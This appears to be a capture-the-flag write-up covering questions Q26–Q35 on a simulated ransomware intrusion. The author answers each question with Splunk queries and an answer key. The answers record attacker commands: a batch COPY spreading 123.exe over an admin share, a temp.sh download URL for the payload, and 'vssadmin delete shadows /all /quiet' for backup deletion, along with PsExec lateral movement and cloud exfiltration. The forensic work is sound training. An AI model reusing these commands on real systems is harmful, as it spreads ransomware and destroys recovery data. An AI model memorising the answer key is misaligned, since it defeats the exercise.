DisableRestrictedAdmin

Q26

After establishing RDP access to the Domain Controller, one domain administrator account was compromised through password modification. Which domain admin account had its password changed by the threat actor?

Answer Format: *********

Answer

lwilliams

Q27

The threat actor utilized a legitimate tool that enabled remote access and command execution across domain systems. What legitimate remote access tool was used to gain access to remote servers and execute commands?

Answer Format: ******.***

Answer

PsExec.exe

Q28

The threat actor expanded their reach to include the organization's file storage infrastructure, likely targeting sensitive data for exfiltration. At what time did the attacker successfully gain access to the file server?

Answer Format: YYYY-MM-DD HH:MM

Let's check the File Server access:

index=* host=FILESERVER earliest="09/07/2025:12:00:00" latest="09/07/2025:23:59:59"
| stats min(_time) as first_activity by host
| eval first_activity=strftime(first_activity, "%Y-%m-%d %H:%M")
| table host, first_activity

FILESERVER    2025-09-07 12:00

Let me check for any process creation on FILESERVER:

index=* host=FILESERVER EventID=1 earliest="09/07/2025:12:00:00" latest="09/07/2025:14:00:00"
| search (Image="*psexec*" OR CommandLine="*psexec*" OR ParentImage="*psexec*")
| head 1
| table _time, ParentImage, Image, CommandLine
| sort _time

we got 2025-09-07 13:35, but that's not correct

The PSEXESVC.exe at 13:35:38 is the service running, but let's check when PsExec was actually used to connect to the FILESERVER:

index=* host=FILESERVER earliest="09/07/2025:13:00:00" latest="09/07/2025:14:00:00"
| search (EventID=4624 OR EventID=4672 OR EventID=5140)
| head 20
| table _time, EventID, User, SourceNetworkAddress, ShareName
| sort _time

I see logon events starting at 13:34:56. Let me get more details about these events:

index=* host=FILESERVER EventID=4624 earliest="09/07/2025:13:34:00" latest="09/07/2025:13:36:00"
| head 1
| table _time, EventID, User, LogonType, SourceNetworkAddress

The logon type shows but details are blank. Let me check the raw event or look at network share access:

index=* host=FILESERVER EventID=5140 earliest="09/07/2025:13:00:00" latest="09/07/2025:14:00:00"
| head 1
| table _time, ShareName, SourceAddress
| sort _time

augh nothing

Check when files were first accessed or created on FILESERVER by an external process:

index=* host=FILESERVER EventID=11 earliest="09/07/2025:13:00:00" latest="09/07/2025:14:00:00"
| head 10
| table _time, Image, TargetFilename
| sort _time

Let me check what happened around 13:34-13:35 more carefully, starting with the first actual attacker activity:

index=* host=FILESERVER earliest="09/07/2025:13:34:00" latest="09/07/2025:13:36:00"
| search EventID=1 OR EventID=11 OR EventID=4624
| table _time, EventID, Image, CommandLine, TargetFilename
| sort _time

Collection

Q29

After gaining access to the file server, the attacker began preparing data for exfiltration by creating compressed archive of the file shares. What directories were targeted for collection and archiving?

Answer Format: *:\****, *:\*********

Answer

G:\docs, g:\Important

Exfiltration

Q30

The threat actor exfiltrated data through a web-based cloud service. Which cloud storage service did the attacker use to upload and exfiltrate the stolen data?

Answer Format: ******

Answer

bublup

Impact

Q31

To facilitate ransomware distribution across the domain, the threat actor created a network share on the Domain Controller that would serve as a staging point. What is the name of the shared directory created on the Domain Controller for ransomware staging?

Answer Format: *****$

Answer

share$

Q32

The ransomware payload was hosted on a file-sharing service and downloaded to the compromised environment. What is the complete URL from which the ransomware package was downloaded?

Answer Format: *****://****.**/*****/***_*****.***

Answer

https://temp.sh/QEyWC/BAT_COMPS.rar

Q33

The downloaded ransomware archive contained batch files for deployment. One of these batch files was responsible for copying the ransomware executable to all domain computers through the established network share. What is the command that was executed from the batch file to copy the ransomware to each target computer?

Answer Format: **** "\\**.**.**.***\*****$\***.***" "*:\*******\****\"

Answer

COPY "\\10.10.11.177\share$\123.exe" "C:\windows\temp\"

Q34

After the ransomware executable was copied to target systems, the threat actor used another batch file to execute the malware across the domain. What is the name of the batch file that was used to execute the previously copied ransomware?

Answer Format: ***.***

Answer

EXE.bat

Q35

To prevent data recovery and ensure maximum impact, the threat actor targeted data recovery mechanisms by deleting the backups. What command was executed to achieve this?

Answer Format: ******** ****** ******* /*** /*****

Answer

vssadmin delete shadows /all /quiet
